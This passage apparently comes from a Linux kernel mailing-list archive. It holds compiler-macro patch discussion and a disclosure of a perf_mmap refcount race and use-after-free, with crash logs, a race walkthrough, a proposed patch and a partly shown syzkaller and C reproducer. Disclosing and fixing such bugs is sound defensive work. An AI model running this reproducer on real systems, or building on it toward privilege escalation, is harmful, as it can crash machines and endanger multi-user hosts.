+    $(warning C=$(KBUILD_CHECKSRC) specified, but $(CHECK) is not available or not up to date)
+    KBUILD_CHECKSRC = 0
+  endif
+endif
+
 # Default kernel image to build when no specific target is given.
 # KBUILD_IMAGE may be overruled on the command line or
 # set in the environment
diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index 04487c9bd751..c601222b495a 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -230,16 +230,6 @@ void ftrace_likely_update(struct ftrace_likely_data *f, int val,
 	__BUILD_BUG_ON_ZERO_MSG(!__is_noncstr(p), \
 				"must be non-C-string (not NUL-terminated)")
 
-/*
- * Use __typeof_unqual__() when available.
- *
- * XXX: Remove test for __CHECKER__ once
- * sparse learns about __typeof_unqual__().
- */
-#if CC_HAS_TYPEOF_UNQUAL && !defined(__CHECKER__)
-# define USE_TYPEOF_UNQUAL 1
-#endif
-
 /*
  * Define TYPEOF_UNQUAL() to use __typeof_unqual__() as typeof
  * operator when available, to return an unqualified type of the exp.
diff --git a/include/linux/compiler_types.h b/include/linux/compiler_types.h
index d3318a3c2577..377df1e64096 100644
--- a/include/linux/compiler_types.h
+++ b/include/linux/compiler_types.h
@@ -562,6 +562,14 @@ struct ftrace_likely_data {
 #define asm_inline asm
 #endif
 
+#ifndef __ASSEMBLY__
+/*
+ * Use __typeof_unqual__() when available.
+ */
+#if CC_HAS_TYPEOF_UNQUAL || defined(__CHECKER__)
+# define USE_TYPEOF_UNQUAL 1
+#endif
+
 /* Are two types/vars the same type (ignoring qualifiers)? */
 #define __same_type(a, b) __builtin_types_compatible_p(typeof(a), typeof(b))
 
@@ -569,6 +577,7 @@ struct ftrace_likely_data {
  * __unqual_scalar_typeof(x) - Declare an unqualified scalar type, leaving
  *			       non-scalar types unchanged.
  */
+#ifndef USE_TYPEOF_UNQUAL
 /*
  * Prefer C11 _Generic for better compile-times and simpler code. Note: 'char'
  * is not type-compatible with 'signed char', and we define a separate case.
@@ -586,6 +595,10 @@ struct ftrace_likely_data {
 		__scalar_type_to_expr_cases(long),		\
 		__scalar_type_to_expr_cases(long long),		\
 		default: (x)))
+#else
+#define __unqual_scalar_typeof(x)	__typeof_unqual__(x)
+#endif
+#endif /* !__ASSEMBLY__ */
 
 /* Is this type a native word size -- useful for atomic operations */
 #define __native_word(t) \
diff --git a/scripts/checker-valid.sh b/scripts/checker-valid.sh
new file mode 100755
index 000000000000..625a789ed1c8
--- /dev/null
+++ b/scripts/checker-valid.sh
@@ -0,0 +1,19 @@
+#!/bin/sh -eu
+# SPDX-License-Identifier: GPL-2.0
+
+[ ! -x "$(command -v "$1")" ] && exit 1
+
+tmp_file=$(mktemp)
+trap "rm -f $tmp_file" EXIT
+
+cat << EOF >$tmp_file
+static inline int u(const int *q)
+{
+	__typeof_unqual__(*q) v = *q;
+	return v;
+}
+EOF
+
+# sparse happily exits with 0 on error so validate
+# there is none on stderr. Use awk as grep is a pain with sh -e
+$@ $tmp_file 2>&1 | awk -v c=1 '/error/{c=0}END{print c}'
{ "author": "Peter Zijlstra <peterz@infradead.org>", "date": "Mon, 2 Feb 2026 17:01:39 +0100", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
On Mon, Feb 02, 2026 at 05:01:39PM +0100, Peter Zijlstra wrote: Great! Then I don't grok why we need to choose between __unqual_scalar_typeof() and __typeof_unqual__() in the arch code. We should just use the former and it will DTRT. Will
{ "author": "Will Deacon <will@kernel.org>", "date": "Mon, 2 Feb 2026 16:05:38 +0000", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
On Mon, Feb 02, 2026 at 03:36:40PM +0000, Will Deacon wrote:

Does it matter for GCC versions that do not support LTO? Because I'm quite sure that if, one day, we add support for GCC LTO, that GCC version will be new enough that it'll just take the __typeof_unqual__() version and it'll "just work". The problem with older GCC versions was that their __auto_type did not actually strip qualifiers (which it should have) -- this was fixed at some point.

On Mon, Feb 02, 2026 at 04:05PM +0000, Will Deacon wrote:

The old __unqual_scalar_typeof() is still broken where __typeof_unqual__() is unavailable - for the arm64 + LTO case that'd be Clang <= 18, which we still have to support.

We could probably just ignore the performance issue ('volatile' reload from stack, rare enough though given volatile variables are not usually allowed) for these older versions and just say "use the newer compiler to get better perf", but the 'const' issue will break the build:

| --- a/arch/arm64/include/asm/rwonce.h
| +++ b/arch/arm64/include/asm/rwonce.h
| @@ -46,7 +46,7 @@
|  #define __READ_ONCE(x)						\
|  ({									\
|  	auto __x = &(x);						\
| -	auto __ret = (__rwonce_typeof_unqual(*__x) *)__x;		\
| +	auto __ret = (__unqual_scalar_typeof(*__x) *)__x;		\
|  	/* Hides alias reassignment from Clang's -Wthread-safety. */	\
|  	auto __retp = &__ret;						\
|  	union { typeof(*__ret) __val; char __c[1]; } __u;		\

Results in:

| In file included from arch/arm64/kernel/asm-offsets.c:11:
| In file included from ./include/linux/arm_sdei.h:8:
| In file included from ./include/acpi/ghes.h:5:
| In file included from ./include/acpi/apei.h:9:
| In file included from ./include/linux/acpi.h:15:
| In file included from ./include/linux/device.h:32:
| In file included from ./include/linux/device/driver.h:21:
| In file included from ./include/linux/module.h:20:
| In file included from ./include/linux/elf.h:6:
| In file included from ./arch/arm64/include/asm/elf.h:141:
| ./include/linux/fs.h:1344:9: error: cannot assign to non-static data member '__val' with const-qualified type 'typeof (*__ret)' (aka 'struct fown_struct *const')
|  1344 |         return READ_ONCE(file->f_owner);
|       |                ^~~~~~~~~~~~~~~~~~~~~~~~
| ./include/asm-generic/rwonce.h:50:2: note: expanded from macro 'READ_ONCE'
|    50 |         __READ_ONCE(x);                                                 \
|       |         ^~~~~~~~~~~~~~
| ./arch/arm64/include/asm/rwonce.h:76:13: note: expanded from macro '__READ_ONCE'
|    76 |         __u.__val = *(volatile typeof(*__x) *)__x;                      \
|       |         ~~~~~~~~~ ^
| ./include/linux/fs.h:1344:9: note: non-static data member '__val' declared const here
|  1344 |         return READ_ONCE(file->f_owner);
|       |                ^~~~~~~~~~~~~~~~~~~~~~~~
| ./include/asm-generic/rwonce.h:50:2: note: expanded from macro 'READ_ONCE'
|    50 |         __READ_ONCE(x);                                                 \
|       |         ^~~~~~~~~~~~~~
| ./arch/arm64/include/asm/rwonce.h:52:25: note: expanded from macro '__READ_ONCE'
|    52 |         union { typeof(*__ret) __val; char __c[1]; } __u;              \
|       |         ~~~~~~~~~~~~~~~^~~~~

... and many many more such errors.
It's an unfortunate mess today, but I hope sooner rather than later we bump the minimum compiler versions so that we can just unconditionally use __typeof_unqual__() and delete __unqual_scalar_typeof(), the __rwonce_typeof_unqual() workaround, and all the other code that appears to be conditional on USE_TYPEOF_UNQUAL:

  % git grep USE_TYPEOF_UNQUAL
  arch/x86/include/asm/percpu.h:#if defined(CONFIG_USE_X86_SEG_SUPPORT) && defined(USE_TYPEOF_UNQUAL)
{ "author": "Marco Elver <elver@google.com>", "date": "Mon, 2 Feb 2026 18:48:47 +0100", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello,

I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.

Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.

The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.

I verified this on Linux kernel version 6.18.5.

Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)

Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning. The full report is as below:

audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] 
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. 
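Before the reproducer walk-through, the invariant the warning enforces is "never increment a reference count that has already reached zero": once the count hits zero the object may be freed, so a later increment signals a stale pointer. A hedged sketch of that check, in the style of an inc-not-zero helper (this is illustrative C11 atomics code, not the kernel's lib/refcount.c):

```c
#include <assert.h>
#include <stdatomic.h>

/* Sketch only: once a count hits zero the object may already be freed,
 * so a later increment means someone holds a stale pointer (UAF).
 * The kernel warns and saturates; this sketch simply refuses. */
static int sketch_inc_not_zero(atomic_int *refs)
{
	int old = atomic_load_explicit(refs, memory_order_relaxed);

	do {
		if (old == 0)
			return 0;	/* object already dead: would be UAF */
	} while (!atomic_compare_exchange_weak_explicit(refs, &old, old + 1,
			memory_order_acquire, memory_order_relaxed));
	return 1;			/* reference successfully taken */
}
```

In the perf_mmap() race below, the equivalent of the `old == 0` branch fires, which is exactly what refcount_warn_saturate() reports as "addition on 0; use-after-free".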
The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow:

1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.

2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.

3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. Meanwhile, thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.

4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, thread B can drop the buffer's reference count to zero during this unprotected window.

5. Crash/Warning: When thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.

Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming.
If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.

Patch
-----
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap

The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it.

Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete.

Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
 kernel/events/core.c | 42 +++++++++++++++++++++---------------------
 1 file changed, 21 insertions(+), 21 deletions(-)

diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
 		ret = perf_mmap_aux(vma, event, nr_pages);
 		if (ret)
 			return ret;
-	}
-
-	/*
-	 * Since pinned accounting is per vm we cannot allow fork() to copy our
-	 * vma.
-	 */
-	vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
-	vma->vm_ops = &perf_mmap_vmops;
-	mapped = get_mapped(event, event_mapped);
-	if (mapped)
-		mapped(event, vma->vm_mm);
-
-	/*
-	 * Try to map it into the page table. On fail, invoke
-	 * perf_mmap_close() to undo the above, as the callsite expects
-	 * full cleanup in this case and therefore does not invoke
-	 * vmops::close().
-	 */
-	ret = map_range(event->rb, vma);
-	if (ret)
-		perf_mmap_close(vma);
+		/*
+		 * Since pinned accounting is per vm we cannot allow fork() to copy our
+		 * vma.
+		 */
+		vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+		vma->vm_ops = &perf_mmap_vmops;
+
+		mapped = get_mapped(event, event_mapped);
+		if (mapped)
+			mapped(event, vma->vm_mm);
+
+		/*
+		 * Try to map it into the page table. On fail, invoke
+		 * perf_mmap_close() to undo the above, as the callsite expects
+		 * full cleanup in this case and therefore does not invoke
+		 * vmops::close().
+		 */
+		ret = map_range(event->rb, vma);
+		if (ret)
+			perf_mmap_close(vma);
+	}
 
 	return ret;
 }
-- 
2.51.0

Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.

Best regards,
Haocheng Yu
Zhejiang University

Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.

audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 
arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 
0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) 
\ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 
bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) 